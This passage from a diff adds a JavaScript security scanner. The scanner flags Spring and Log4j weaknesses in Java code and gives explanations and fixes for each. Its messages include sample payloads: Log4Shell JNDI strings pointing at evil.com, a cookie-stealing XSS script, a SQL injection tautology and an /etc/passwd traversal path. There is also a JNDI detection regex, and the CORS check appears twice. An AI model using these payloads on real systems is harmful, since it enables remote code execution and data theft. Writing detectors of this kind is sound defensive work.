+ * - #30: Insecure Session Configuration (@RestController without STATELESS)
12
+ * - #35: Missing @EnableGlobalMethodSecurity
13
+ *
14
+ * Added: Phase 6 Week 2 Day 5 (2025-11-19)
15
+ * Updated: 2025-12-01 (added checks #27-30)
16
+ */
17
+ Object.defineProperty(exports, "__esModule", { value: true });
18
+ exports.checkFrameworkSecurity = checkFrameworkSecurity;
19
+ const createVulnerability_1 = require("../utils/createVulnerability");
20
+ const code_cleaner_1 = require("../../../utils/code-cleaner");
21
+ /**
22
+ * Checks for Log4j and Spring Security vulnerabilities in Java code
23
+ *
24
+ * @param lines - Array of code lines to analyze
25
+ * @param code - Full code string (needed for multi-line checks)
26
+ * @returns Array of detected security vulnerabilities
27
+ */
28
+ function checkFrameworkSecurity(lines, code) {
29
+ const vulnerabilities = [];
30
+ let inMultiLineComment = false;
31
+ lines.forEach((line, index) => {
32
+ const lineNumber = index + 1;
33
+ const trimmed = line.trim();
34
+ // CRITICAL: Track multi-line comment blocks (/* ... */)
35
+ if (trimmed.includes('/*')) {
36
+ inMultiLineComment = true;
37
+ }
38
+ if (trimmed.includes('*/')) {
39
+ inMultiLineComment = false;
40
+ return; // Skip the line with */
41
+ }
42
+ // CRITICAL: Skip all lines inside multi-line comments and single-line comments
43
+ // FIX (Dec 6, 2025): Added proper multi-line comment tracking
44
+ if (!trimmed ||
45
+ inMultiLineComment ||
46
+ trimmed.startsWith('//')) {
47
+ return;
48
+ }
49
+ // ==================== Spring Framework Security Detection ====================
50
+ // 21. Missing CSRF Protection - HIGH
51
+ if (trimmed.match(/@(PostMapping|PutMapping|DeleteMapping|RequestMapping)\s*\(/)) {
52
+ const prevLines = lines.slice(Math.max(0, index - 10), index);
53
+ const nextLines = lines.slice(index + 1, Math.min(index + 10, lines.length));
54
+ const allContext = [...prevLines, ...nextLines];
55
+ const hasCsrfDisabled = allContext.some(l => l.includes('@EnableWebSecurity') && l.includes('csrf().disable()'));
56
+ const hasCsrfToken = allContext.some(l => l.includes('CsrfToken') || l.includes('@CsrfToken'));
57
+ if (hasCsrfDisabled || !hasCsrfToken) {
58
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('spring-missing-csrf', '@PostMapping/@PutMapping/@DeleteMapping without CSRF protection', 'Enable CSRF: Configure Spring Security with .csrf() enabled and validate tokens', lineNumber, 'Spring endpoints that modify state (POST/PUT/DELETE) without CSRF protection are vulnerable to Cross-Site Request Forgery attacks. Attackers can trick authenticated users into executing unwanted actions (transferring funds, changing passwords, deleting data) by embedding malicious requests in third-party websites.', '@PostMapping("/transfer") on banking app + attacker website with <form> auto-submits to transfer money', [
59
+ 'Unauthorized state changes',
60
+ 'Account takeover',
61
+ 'Data modification/deletion',
62
+ 'Financial fraud',
63
+ 'Compliance violations (PCI-DSS)'
64
+ ], '@PostMapping("/users")\npublic User createUser(@RequestBody User user) {\n return userService.save(user); // No CSRF token validation\n}', '// In SecurityConfig:\nhttp.csrf().csrfTokenRepository(CookieCsrfTokenRepository.withHttpOnlyFalse());\n\n// In Controller:\n@PostMapping("/users")\npublic User createUser(@RequestBody User user, CsrfToken token) {\n return userService.save(user); // CSRF token validated automatically\n}', 'Enable CSRF protection in Spring Security configuration. For REST APIs using JWT/OAuth, CSRF may not be needed if using stateless authentication. For session-based authentication, CSRF protection is critical'));
65
+ }
66
+ }
67
+ // 22. Missing Authorization - CRITICAL
68
+ const hasSensitiveEndpoint = trimmed.match(/@(GetMapping|RequestMapping|PostMapping|PutMapping|DeleteMapping|PatchMapping)\s*\(/) &&
69
+ (trimmed.includes('/admin') || trimmed.includes('/delete') || trimmed.includes('/users') ||
70
+ trimmed.includes('/update') || trimmed.includes('/remove') || trimmed.includes('/financial') ||
71
+ trimmed.includes('/payment') || trimmed.includes('/transaction') || trimmed.includes('/system'));
72
+ if (hasSensitiveEndpoint && !trimmed.startsWith('/*') && !trimmed.startsWith('*')) {
73
+ const prevLines = lines.slice(Math.max(0, index - 10), index);
74
+ const hasAuth = prevLines.some(l => {
75
+ const lt = l.trim();
76
+ const codeOnly = code_cleaner_1.CodeCleaner.removeLineComments(l, 'java');
77
+ return !lt.startsWith('//') &&
78
+ (codeOnly.includes('@PreAuthorize') ||
79
+ codeOnly.includes('@Secured') ||
80
+ codeOnly.includes('@RolesAllowed'));
81
+ });
82
+ if (!hasAuth) {
83
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('spring-missing-authorization', 'Sensitive endpoint without @PreAuthorize/@Secured authorization', 'Add @PreAuthorize("hasRole(\'ADMIN\')") or @Secured("ROLE_ADMIN") before endpoint', lineNumber, 'Spring endpoints accessing sensitive resources without authorization checks allow any authenticated user (or unauthenticated if security is misconfigured) to access admin functions, view/modify other users\' data, or perform privileged operations.', '@GetMapping("/admin/users") without @PreAuthorize allows regular users to list all users', [
84
+ 'Unauthorized data access',
85
+ 'Privilege escalation',
86
+ 'Data breach',
87
+ 'Account takeover',
88
+ 'Compliance violations (GDPR, SOC2)'
89
+ ], '@GetMapping("/admin/users")\npublic List<User> getAllUsers() {\n return userService.findAll(); // No authorization check\n}', '@PreAuthorize("hasRole(\'ADMIN\')")\n@GetMapping("/admin/users")\npublic List<User> getAllUsers() {\n return userService.findAll(); // Only accessible to ADMIN role\n}', 'Use @PreAuthorize with SpEL expressions for fine-grained authorization. Enable method security with @EnableGlobalMethodSecurity(prePostEnabled = true). Check user roles/permissions before accessing sensitive data'));
90
+ }
91
+ }
92
+ // 23. Unsafe ResponseBody (XSS) - CRITICAL
93
+ if ((trimmed.includes('@ResponseBody') || trimmed.includes('@RestController')) &&
94
+ !trimmed.startsWith('//') && !trimmed.startsWith('/*') && !trimmed.startsWith('*')) {
95
+ const prevLines = lines.slice(Math.max(0, index - 5), index);
96
+ const nextLines = [];
97
+ let braceCount = 0;
98
+ for (let i = index + 1; i < Math.min(index + 15, lines.length); i++) {
99
+ const l = lines[i];
100
+ for (const char of l) {
101
+ if (char === '{')
102
+ braceCount++;
103
+ if (char === '}')
104
+ braceCount--;
105
+ }
106
+ nextLines.push(l);
107
+ if (braceCount < 0 || (braceCount === 0 && l.includes('}'))) {
108
+ break;
109
+ }
110
+ }
111
+ const allContext = [...prevLines, ...nextLines];
112
+ const hasUserInputParam = allContext.some(l => {
113
+ const lt = l.trim();
114
+ return !lt.startsWith('//') &&
115
+ l.match(/@RequestParam|@PathVariable|@RequestBody|getParameter|request\.|req\./);
116
+ });
117
+ const hasHtmlConcatenation = nextLines.some(l => {
118
+ const lt = l.trim();
119
+ if (lt.startsWith('//') || lt.startsWith('/*'))
120
+ return false;
121
+ const hasReturn = lt.match(/return\s+/);
122
+ const hasHtmlTag = lt.match(/<\/?[a-zA-Z][^>]*>/);
123
+ const hasConcatenation = lt.includes('+') || lt.includes('concat(');
124
+ const hasStringLiteral = lt.includes('"') || lt.includes("'");
125
+ return hasReturn && hasHtmlTag && hasConcatenation && hasStringLiteral;
126
+ });
127
+ if (hasUserInputParam && hasHtmlConcatenation) {
128
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('spring-xss-responsebody', '@ResponseBody with unsanitized HTML - Cross-Site Scripting (XSS)', 'Use @RestController with JSON responses, or sanitize HTML with OWASP Java HTML Sanitizer', lineNumber, 'Returning HTML with unsanitized user input in @ResponseBody allows attackers to inject malicious JavaScript that executes in victims\' browsers. This can steal session cookies, capture credentials, perform actions as the victim, or redirect to phishing sites.', 'return "<h1>Hello " + name + "</h1>" where name = "<script>alert(document.cookie)</script>" executes in browser', [
129
+ 'Session hijacking (cookie theft)',
130
+ 'Credential theft (keylogging)',
131
+ 'Account takeover',
132
+ 'Malware distribution',
133
+ 'Phishing attacks'
134
+ ], '@GetMapping("/greet")\n@ResponseBody\npublic String greet(@RequestParam String name) {\n return "<h1>Hello " + name + "</h1>"; // XSS vulnerability\n}', '// Option 1: Use JSON (recommended)\n@GetMapping("/greet")\npublic Map<String, String> greet(@RequestParam String name) {\n return Map.of("greeting", "Hello " + name); // JSON auto-encoded\n}\n\n// Option 2: Sanitize HTML\nimport org.owasp.html.PolicyFactory;\nimport org.owasp.html.Sanitizers;\n\n@GetMapping("/greet")\n@ResponseBody\npublic String greet(@RequestParam String name) {\n PolicyFactory sanitizer = Sanitizers.FORMATTING;\n String safeName = sanitizer.sanitize(name);\n return "<h1>Hello " + safeName + "</h1>";\n}', 'Prefer JSON responses with @RestController instead of raw HTML. If HTML is required, use OWASP Java HTML Sanitizer to remove malicious scripts. Never trust user input in HTML context'));
135
+ }
136
+ }
137
+ // 24. Missing Input Validation - HIGH
138
+ if (trimmed.match(/@RequestBody\s+(?!@Valid)/) &&
139
+ !trimmed.includes('@Valid') &&
140
+ !trimmed.startsWith('//')) {
141
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('spring-missing-validation', '@RequestBody without @Valid - Missing input validation', 'Add @Valid annotation: public User register(@Valid @RequestBody User user)', lineNumber, 'Request bodies without validation allow attackers to send malformed, excessively long, or malicious data that can cause application errors, database constraint violations, or business logic bypasses. Missing validation on email, password, or numeric fields can lead to injection attacks or data corruption.', '@RequestBody User user without @Valid allows email="" or password="a" violating business rules', [
142
+ 'SQL injection via malformed input',
143
+ 'Business logic bypass',
144
+ 'Data corruption',
145
+ 'Denial of Service (oversized payloads)',
146
+ 'Application errors'
147
+ ], '@PostMapping("/register")\npublic User register(@RequestBody User user) {\n return userService.save(user); // No validation\n}', '// In User.java\npublic class User {\n @NotBlank @Email\n private String email;\n \n @NotBlank @Size(min = 8, max = 100)\n private String password;\n}\n\n// In Controller\n@PostMapping("/register")\npublic User register(@Valid @RequestBody User user) {\n return userService.save(user); // Validated automatically\n}', 'Use @Valid with Bean Validation annotations (@NotNull, @NotBlank, @Email, @Size, @Pattern). Configure global exception handler for MethodArgumentNotValidException to return user-friendly errors'));
148
+ }
149
+ // 25. SQL Injection in JPA @Query - CRITICAL
150
+ if (trimmed.includes('@Query') &&
151
+ (trimmed.includes('+') || trimmed.includes('concat')) &&
152
+ !trimmed.startsWith('//')) {
153
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('spring-jpa-sql-injection', '@Query with string concatenation - SQL Injection vulnerability', 'Use parameterized queries: @Query("SELECT u FROM User u WHERE u.name = :name")', lineNumber, 'String concatenation in JPA @Query annotations allows SQL injection attacks. Attackers can manipulate the query to access unauthorized data, modify/delete records, or execute administrative database operations. JPA does not prevent SQL injection when using string concatenation.', '@Query("SELECT u FROM User u WHERE u.name = \'" + name + "\'") where name = "\' OR \'1\'=\'1" returns all users', [
154
+ 'Full database access (read/write/delete)',
155
+ 'Authentication bypass',
156
+ 'Data exfiltration',
157
+ 'Data destruction',
158
+ 'Privilege escalation'
159
+ ], '@Query("SELECT u FROM User u WHERE u.name = \'" + name + "\'")\nList<User> findByName(String name); // SQL injection', '@Query("SELECT u FROM User u WHERE u.name = :name")\nList<User> findByName(@Param("name") String name); // Safe: parameterized\n\n// Or use method naming\nList<User> findByName(String name); // Spring Data generates safe query', 'Use named parameters (:paramName) or positional parameters (?1) in @Query. Spring Data will parameterize them safely. Better yet, use Spring Data method naming conventions to avoid writing queries'));
160
+ }
161
+ // 26. Missing @Transactional - MEDIUM
162
+ // FIX (Dec 9, 2025): Exclude crypto APIs that have .update() methods
163
+ // False positive: MessageDigest.update(), Signature.update(), Mac.update()
164
+ if (trimmed.match(/\.(save|delete|update|persist|merge|flush)\s*\(/) &&
165
+ !trimmed.startsWith('//')) {
166
+ // Exclude cryptographic APIs (not database operations)
167
+ const isCryptoAPI = trimmed.match(/MessageDigest.*\.update/) ||
168
+ trimmed.match(/Signature.*\.update/) ||
169
+ trimmed.match(/Mac.*\.update/);
170
+ if (isCryptoAPI) {
171
+ return; // Skip - this is crypto, not database
172
+ }
173
+ const prevLines = lines.slice(Math.max(0, index - 5), index);
174
+ const hasTransactional = prevLines.some(l => l.includes('@Transactional'));
175
+ if (!hasTransactional) {
176
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('spring-missing-transactional', 'Database operation without @Transactional - Data integrity risk', 'Add @Transactional annotation to method or class', lineNumber, 'Database operations without transactions can leave data in inconsistent states if an error occurs mid-operation. Multiple database changes may partially complete, violating data integrity constraints. Security logs may be incomplete. Transactions ensure atomicity (all-or-nothing) for related database operations.', 'User created but role assignment fails → orphaned user account with no permissions', [
177
+ 'Data inconsistency',
178
+ 'Partial data commits',
179
+ 'Security audit log gaps',
180
+ 'Business rule violations',
181
+ 'Database constraint violations'
182
+ ], 'public void createUser(User user) {\n userRepository.save(user); // No transaction\n roleRepository.save(new Role(user, "USER")); // May fail\n}', '@Transactional\npublic void createUser(User user) {\n userRepository.save(user);\n roleRepository.save(new Role(user, "USER"));\n // Both succeed or both rollback\n}', 'Use @Transactional on service methods that perform multiple database operations. Configure rollback for checked exceptions with @Transactional(rollbackFor = Exception.class). Ensures data consistency and security audit trail completeness'));
183
+ }
184
+ }
185
+ // 27. Insecure CORS - HIGH
186
+ if (trimmed.includes('@CrossOrigin') &&
187
+ (trimmed.includes('*') || trimmed.includes('"*"')) &&
188
+ !trimmed.startsWith('//')) {
189
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('spring-insecure-cors', '@CrossOrigin(origins = "*") - Insecure CORS policy', 'Specify allowed origins: @CrossOrigin(origins = "https://trusted-domain.com")', lineNumber, 'Setting CORS to allow all origins (*) permits any website to make authenticated requests to your API. Combined with credentials (cookies, Authorization headers), this allows malicious sites to access user data, perform actions as the victim, or steal sensitive information.', '@CrossOrigin(origins = "*") + withCredentials allows evil.com to read /api/user/profile', [
190
+ 'Cross-origin data theft',
191
+ 'Session hijacking',
192
+ 'CSRF-like attacks',
193
+ 'API abuse from malicious sites',
194
+ 'Credential leakage'
195
+ ], '@CrossOrigin(origins = "*")\n@RestController\npublic class ApiController {\n @GetMapping("/user/profile")\n public User getProfile() { return currentUser(); }\n}', '@CrossOrigin(\n origins = {"https://app.company.com", "https://admin.company.com"},\n allowCredentials = "true"\n)\n@RestController\npublic class ApiController {\n @GetMapping("/user/profile")\n public User getProfile() { return currentUser(); }\n}', 'Specify exact allowed origins. Never use * with credentials. Use environment-specific configuration for origins. Consider using Spring Security\'s CORS configuration for global settings'));
196
+ }
197
+ // 28. Path Traversal - HIGH
198
+ if (trimmed.includes('@PathVariable') &&
199
+ !trimmed.startsWith('//')) {
200
+ const nextLines = lines.slice(index + 1, Math.min(index + 10, lines.length));
201
+ const hasFileOperation = nextLines.some(l => l.match(/new\s+File\s*\(/) ||
202
+ l.includes('Files.read') ||
203
+ l.includes('Files.write') ||
204
+ l.includes('.readAllBytes') ||
205
+ l.includes('FileInputStream') ||
206
+ l.includes('FileOutputStream'));
207
+ if (hasFileOperation) {
208
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('spring-path-traversal', '@PathVariable used in file operations - Path Traversal vulnerability', 'Validate path: Use Path.normalize() and check .startsWith(baseDir)', lineNumber, '@PathVariable values come directly from the URL and can contain path traversal sequences (../, ../../) that allow attackers to escape the intended directory and access arbitrary files on the server, including configuration files, credentials, source code, or system files.', '@GetMapping("/files/{filename}") + filename="../../../etc/passwd" reads /etc/passwd', [
209
+ 'Arbitrary file read (credentials, configs)',
210
+ 'Source code disclosure',
211
+ 'System file access (/etc/passwd)',
212
+ 'Information disclosure',
213
+ 'Remote code execution (if write enabled)'
214
+ ], '@GetMapping("/files/{filename}")\npublic byte[] getFile(@PathVariable String filename) {\n return Files.readAllBytes(Paths.get("/uploads/" + filename)); // Vulnerable\n}', '@GetMapping("/files/{filename}")\npublic byte[] getFile(@PathVariable String filename) {\n Path baseDir = Paths.get("/uploads").toAbsolutePath().normalize();\n Path filePath = baseDir.resolve(filename).normalize();\n \n if (!filePath.startsWith(baseDir)) {\n throw new SecurityException("Path traversal detected");\n }\n \n return Files.readAllBytes(filePath); // Safe\n}', 'Normalize paths with .normalize(). Validate resolved path stays within base directory with .startsWith(). Reject paths containing .. or absolute paths. Use whitelist of allowed filenames if possible'));
215
+ }
216
+ }
217
+ // 29. Missing Rate Limiting - MEDIUM
218
+ if (trimmed.match(/@(PostMapping|RequestMapping)\s*\(/) &&
219
+ (trimmed.includes('/login') || trimmed.includes('/auth') || trimmed.includes('/signin')) &&
220
+ !trimmed.startsWith('//')) {
221
+ const prevLines = lines.slice(Math.max(0, index - 5), index);
222
+ const nextLines = lines.slice(index + 1, Math.min(index + 3, lines.length));
223
+ const allContext = [...prevLines, ...nextLines];
224
+ const hasRateLimit = allContext.some(l => l.includes('@RateLimiter') ||
225
+ l.includes('@RateLimit') ||
226
+ l.includes('@Bucket'));
227
+ if (!hasRateLimit) {
228
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('spring-missing-rate-limit', 'Authentication endpoint without rate limiting - Brute force risk', 'Add rate limiting: Use Bucket4j, Resilience4j, or Spring Security rate limiting', lineNumber, 'Authentication endpoints without rate limiting allow unlimited login attempts, enabling brute force attacks to guess passwords. Attackers can try thousands of password combinations, credential stuffing attacks using leaked password lists, or cause denial of service through excessive requests.', '/login without rate limiting → attacker tries 10,000 passwords → successful breach', [
229
+ 'Brute force password guessing',
230
+ 'Credential stuffing attacks',
231
+ 'Account takeover',
232
+ 'Denial of Service',
233
+ 'Resource exhaustion'
234
+ ], '@PostMapping("/login")\npublic ResponseEntity<AuthResponse> login(@RequestBody LoginRequest request) {\n return authService.authenticate(request); // No rate limiting\n}', '// Using Bucket4j\n@PostMapping("/login")\n@RateLimiter(name = "loginLimiter")\npublic ResponseEntity<AuthResponse> login(@RequestBody LoginRequest request) {\n return authService.authenticate(request);\n}\n\n// In application.yml\nresilience4j.ratelimiter:\n instances:\n loginLimiter:\n limitForPeriod: 5\n limitRefreshPeriod: 60s', 'Implement rate limiting on authentication endpoints (e.g., 5 attempts per minute per IP). Use Bucket4j, Resilience4j, or Spring Cloud Gateway rate limiting. Consider account lockout after repeated failures. Monitor for brute force patterns'));
235
+ }
236
+ }
237
+ // 30. Insecure Session Configuration - HIGH
238
+ if (trimmed.includes('@RestController')) {
239
+ const hasStatelessSession = lines.some(l => l.includes('sessionCreationPolicy') &&
240
+ (l.includes('STATELESS') || l.includes('SessionCreationPolicy.STATELESS')));
241
+ if (!hasStatelessSession && lines.some(l => l.includes('HttpSecurity'))) {
242
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('spring-insecure-session', '@RestController without STATELESS session policy - Session fixation risk', 'Configure Spring Security: .sessionManagement().sessionCreationPolicy(SessionCreationPolicy.STATELESS)', lineNumber, 'REST APIs should use stateless authentication (JWT, OAuth tokens) instead of server-side sessions. Session-based authentication in REST APIs is vulnerable to session fixation, CSRF, and doesn\'t scale horizontally. Attackers can exploit session predictability or steal session cookies.', 'Session-based REST API vulnerable to session fixation attack → attacker forces victim to use known session ID', [
243
+ 'Session fixation attacks',
244
+ 'CSRF vulnerabilities',
245
+ 'Session hijacking',
246
+ 'Scalability issues',
247
+ 'Mobile app compatibility problems'
248
+ ], '@Configuration\n@EnableWebSecurity\npublic class SecurityConfig {\n protected void configure(HttpSecurity http) {\n http.authorizeRequests().anyRequest().authenticated();\n // Missing sessionCreationPolicy\n }\n}', '@Configuration\n@EnableWebSecurity\npublic class SecurityConfig {\n protected void configure(HttpSecurity http) {\n http\n .sessionManagement()\n .sessionCreationPolicy(SessionCreationPolicy.STATELESS)\n .and()\n .authorizeRequests().anyRequest().authenticated();\n }\n}', 'Use SessionCreationPolicy.STATELESS for REST APIs with JWT/OAuth. Disable session creation entirely. Use token-based authentication instead of server-side sessions for better security and scalability'));
249
+ }
250
+ }
251
+ // ==================== Log4j Vulnerability Detection ====================
252
+ // 31. Vulnerable Log4j Version - CRITICAL
253
+ if (trimmed.match(/import\s+org\.apache\.logging\.log4j/) &&
254
+ !trimmed.startsWith('//')) {
255
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('log4j-vulnerable-version', 'Log4j import detected - Verify version is NOT 2.0-2.14.1 (CVE-2021-44228)', 'Update to Log4j 2.17.1+ or use log4j2.formatMsgNoLookups=true for 2.10+', lineNumber, 'Log4j versions 2.0-2.14.1 are vulnerable to CVE-2021-44228 (Log4Shell), a critical remote code execution vulnerability. Attackers can execute arbitrary code by injecting JNDI lookup strings into log messages. This affects ANY application using vulnerable Log4j versions.', 'logger.info(userInput) where userInput = "${jndi:ldap://evil.com/Exploit}" executes attacker code', [
256
+ 'Remote Code Execution (RCE)',
257
+ 'Complete server compromise',
258
+ 'Data exfiltration',
259
+ 'Ransomware deployment',
260
+ 'Supply chain attacks'
261
+ ], 'import org.apache.logging.log4j.Logger; // Version unknown - may be vulnerable', '// Update pom.xml or build.gradle:\n// <log4j.version>2.17.1</log4j.version>\n\n// Or set JVM property for Log4j 2.10+:\n// -Dlog4j2.formatMsgNoLookups=true\n\nimport org.apache.logging.log4j.Logger; // Use 2.17.1+', 'Update to Log4j 2.17.1 or later. For versions 2.10-2.14.1, set -Dlog4j2.formatMsgNoLookups=true. For older versions, upgrade immediately. Verify with: mvn dependency:tree | grep log4j'));
262
+ }
263
+ // 32. Unsafe Logging Pattern - CRITICAL
264
+ if (trimmed.match(/logger\.(info|debug|warn|error|trace|fatal)\s*\(/) &&
265
+ !trimmed.startsWith('//')) {
266
+ const hasConcatenation = trimmed.match(/logger\.(info|debug|warn|error|trace|fatal)\s*\([^)]*(\+|\.concat\()/);
267
+ if (hasConcatenation) {
268
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('log4j-unsafe-logging', 'Log4j: String concatenation in logger - Log4Shell RCE risk', 'Use parameterized logging with {} placeholders instead of concatenation', lineNumber, 'String concatenation in Log4j logger calls is dangerous with Log4j 2.0-2.14.1 (CVE-2021-44228). If any concatenated value contains user input (direct or indirect), attackers can inject JNDI lookup strings (${jndi:ldap://...}) which Log4j evaluates, leading to remote code execution. Even values from databases, APIs, or method calls could originate from user input.', 'logger.info("Payment: " + payment.getAmount()) where getAmount() returns user-controlled "${jndi:ldap://evil.com/Exploit}" executes attacker code', [
269
+ 'Remote Code Execution (RCE) via Log4Shell',
270
+ 'Complete server compromise',
271
+ 'Data breach (credentials, secrets)',
272
+ 'Lateral movement in network',
273
+ 'Cryptomining/ransomware deployment'
274
+ ], 'logger.info("Payment amount: " + payment.getAmount());\nlogger.debug("Search query: " + query);', '// SAFE: Use parameterized logging (Log4j handles escaping)\nlogger.info("Payment amount: {}", payment.getAmount());\nlogger.debug("Search query: {}", query);\n\n// Note: In Log4j 2.17.1+, {} parameters are NOT evaluated for ${...} patterns', 'Use parameterized logging with {} placeholders instead of string concatenation. Log4j 2.17.1+ does not evaluate ${...} in parameters. Upgrade to 2.17.1+ and use logger.info("msg: {}", value) pattern'));
275
+ }
276
+ }
277
+ // 33. JNDI Lookup Pattern Detection - CRITICAL
278
+ if (trimmed.match(/\$\{jndi:(ldap|rmi|dns|iiop|corba|nds|nis):\/\//i) &&
279
+ !trimmed.startsWith('//')) {
280
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('log4j-jndi-pattern', 'Log4j: JNDI lookup pattern detected - Potential Log4Shell exploit attempt', 'This is a known Log4Shell attack pattern. Investigate immediately and update Log4j', lineNumber, 'The ${jndi:ldap://} pattern is the exploit signature for CVE-2021-44228 (Log4Shell). This pattern instructs Log4j to perform a JNDI lookup to a remote server, which can return malicious Java objects that execute arbitrary code when deserialized.', '${jndi:ldap://evil.com/Exploit} → Log4j connects to evil.com, downloads Exploit.class, executes it', [
281
+ 'Active exploitation attempt (if in user input)',
282
+ 'Remote Code Execution (RCE)',
283
+ 'Immediate server compromise',
284
+ 'Data exfiltration in progress',
285
+ 'Potential ongoing attack'
286
+ ], 'String userInput = "${jndi:ldap://attacker.com/Exploit}";\nlogger.error(userInput); // CRITICAL: This executes attacker code', '// 1. Update to Log4j 2.17.1+ immediately\n// 2. Set -Dlog4j2.formatMsgNoLookups=true for 2.10-2.14.1\n// 3. Sanitize all user input:\nString safe = input.replaceAll("\\\\$\\\\{.*?\\\\}", "");\nlogger.error(safe);', 'This is an active Log4Shell exploit attempt. Update Log4j immediately to 2.17.1+. For 2.10-2.14.1, set -Dlog4j2.formatMsgNoLookups=true. Sanitize all user input to remove ${...} patterns'));
287
+ }
288
+ // 34. Missing formatMsgNoLookups Configuration - HIGH
289
+ if (trimmed.match(/import\s+org\.apache\.logging\.log4j/) &&
290
+ !code.includes('formatMsgNoLookups') &&
291
+ !code.includes('log4j2.formatMsgNoLookups') &&
292
+ !trimmed.startsWith('//')) {
293
+ const isFirstImport = lines.slice(0, index).every(l => !l.match(/import\s+org\.apache\.logging\.log4j/));
294
+ if (isFirstImport) {
295
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('log4j-missing-protection', 'Log4j: Missing formatMsgNoLookups protection - CVE-2021-44228 mitigation absent', 'Set -Dlog4j2.formatMsgNoLookups=true or upgrade to Log4j 2.17.1+', lineNumber, 'For Log4j 2.10-2.14.1, setting log4j2.formatMsgNoLookups=true disables JNDI lookups in log messages, mitigating CVE-2021-44228. Without this property, the application remains vulnerable to Log4Shell attacks even with input sanitization (attackers can exploit other vectors).', 'Log4j 2.10-2.14.1 without formatMsgNoLookups=true → vulnerable to ${jndi:ldap://} attacks', [
296
+ 'Log4Shell (CVE-2021-44228) vulnerability',
297
+ 'Remote Code Execution (RCE) risk',
298
+ 'Incomplete mitigation',
299
+ 'Exploitable via multiple vectors',
300
+ 'Compliance violations'
301
+ ], 'import org.apache.logging.log4j.Logger;\n// No formatMsgNoLookups protection configured', '// Option 1: Set JVM property (for Log4j 2.10-2.14.1)\n// Add to java command: -Dlog4j2.formatMsgNoLookups=true\n\n// Option 2: Set environment variable\n// LOG4J_FORMAT_MSG_NO_LOOKUPS=true\n\n// Option 3 (BEST): Update to Log4j 2.17.1+ (fix built-in)\nimport org.apache.logging.log4j.Logger; // 2.17.1+', 'Best solution: Update to Log4j 2.17.1+ which has the fix built-in. For 2.10-2.14.1, set -Dlog4j2.formatMsgNoLookups=true as JVM argument. For 2.0-2.9, upgrade immediately (property not available)'));
302
+ }
303
+ }
304
+ // ==================== Spring Security ====================
305
+ // 35. Missing @EnableGlobalMethodSecurity - MEDIUM
306
+ if (trimmed.match(/@EnableWebSecurity|extends\s+WebSecurityConfigurerAdapter/) &&
307
+ !trimmed.startsWith('//') && !trimmed.startsWith('/*') && !trimmed.startsWith('*')) {
308
+ const prevLines = lines.slice(Math.max(0, index - 10), index);
309
+ const nextLines = lines.slice(index + 1, Math.min(index + 20, lines.length));
310
+ const allContext = [...prevLines, line, ...nextLines];
311
+ const isConfigClass = allContext.some(l => l.trim().includes('@Configuration') && !l.trim().startsWith('//'));
312
+ const hasGlobalMethodSecurity = allContext.some(l => l.trim().includes('@EnableGlobalMethodSecurity') && !l.trim().startsWith('//'));
313
+ if (isConfigClass && !hasGlobalMethodSecurity) {
314
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('spring-missing-method-security', 'Missing @EnableGlobalMethodSecurity - method-level security annotations won\'t work', 'Add @EnableGlobalMethodSecurity(prePostEnabled = true, securedEnabled = true) to enable @PreAuthorize, @Secured, @RolesAllowed', lineNumber, 'Without @EnableGlobalMethodSecurity, Spring method security annotations (@PreAuthorize, @Secured, @RolesAllowed) are silently ignored. Service methods with these annotations appear protected but are actually accessible by anyone. This creates a false sense of security while leaving critical business logic (funds transfers, account deletions, sensitive data access) completely unprotected.', 'BankingService with @PreAuthorize("hasRole(\'ADMIN\')") on transferFunds() → annotation ignored, anyone can transfer funds', [
315
+ 'Authentication bypass',
316
+ 'Unauthorized access to critical methods',
317
+ 'Data manipulation by unprivileged users',
318
+ 'False sense of security (annotations present but inactive)',
319
+ 'Privilege escalation',
320
+ 'Compliance violations (SOC2, PCI-DSS)'
321
+ ], '@Configuration\n@EnableWebSecurity\npublic class SecurityConfig extends WebSecurityConfigurerAdapter {\n // @PreAuthorize, @Secured won\'t work!\n}', '@Configuration\n@EnableWebSecurity\n@EnableGlobalMethodSecurity(\n prePostEnabled = true, // Enables @PreAuthorize, @PostAuthorize\n securedEnabled = true, // Enables @Secured\n jsr250Enabled = true // Enables @RolesAllowed\n)\npublic class SecurityConfig extends WebSecurityConfigurerAdapter {\n // Method-level security now active\n}', 'Enable @EnableGlobalMethodSecurity with appropriate flags. Use prePostEnabled=true for @PreAuthorize/@PostAuthorize (most flexible with SpEL expressions), securedEnabled=true for @Secured, jsr250Enabled=true for @RolesAllowed (JSR-250 standard). Restart application after enabling - annotations are processed at startup'));
322
+ }
323
+ }
324
+ // 27. Insecure CORS - HIGH
325
+ if (trimmed.includes('@CrossOrigin') &&
326
+ (trimmed.includes('*') || trimmed.includes('"*"')) &&
327
+ !trimmed.startsWith('//')) {
328
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('spring-insecure-cors', '@CrossOrigin(origins = "*") - Insecure CORS policy', 'Specify allowed origins: @CrossOrigin(origins = "https://trusted-domain.com")', lineNumber, 'Setting CORS to allow all origins (*) permits any website to make authenticated requests to your API. Combined with credentials (cookies, Authorization headers), this allows malicious sites to access user data, perform actions as the victim, or steal sensitive information.', '@CrossOrigin(origins = "*") + withCredentials allows evil.com to read /api/user/profile', [
329
+ 'Cross-origin data theft',
330
+ 'Session hijacking',
331
+ 'CSRF-like attacks',
332
+ 'API abuse from malicious sites',
333
+ 'Credential leakage'
334
